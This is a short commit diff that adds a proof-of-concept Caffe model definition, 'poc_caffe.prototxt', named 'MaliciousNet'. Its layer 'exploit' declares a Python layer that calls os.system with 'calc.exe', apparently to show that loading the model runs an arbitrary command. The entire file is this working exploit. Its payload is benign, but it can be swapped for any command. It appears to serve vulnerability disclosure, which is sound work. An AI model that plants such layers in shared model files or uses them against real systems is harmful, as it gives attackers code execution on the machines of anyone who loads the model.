Add PoC file: poc_caffe.prototxt
Browse files- poc_caffe.prototxt +18 -0
poc_caffe.prototxt
ADDED
|
@@ -0,0 +1,18 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
name: "MaliciousNet"
|
| 2 |
+
layer {
|
| 3 |
+
name: "data"
|
| 4 |
+
type: "Input"
|
| 5 |
+
top: "data"
|
| 6 |
+
input_param { shape: { dim: 1 dim: 3 dim: 224 dim: 224 } }
|
| 7 |
+
}
|
| 8 |
+
layer {
|
| 9 |
+
name: "exploit"
|
| 10 |
+
type: "Python"
|
| 11 |
+
bottom: "data"
|
| 12 |
+
top: "output"
|
| 13 |
+
python_param {
|
| 14 |
+
module: "os"
|
| 15 |
+
layer: "system"
|
| 16 |
+
param_str: "calc.exe"
|
| 17 |
+
}
|
| 18 |
+
}
|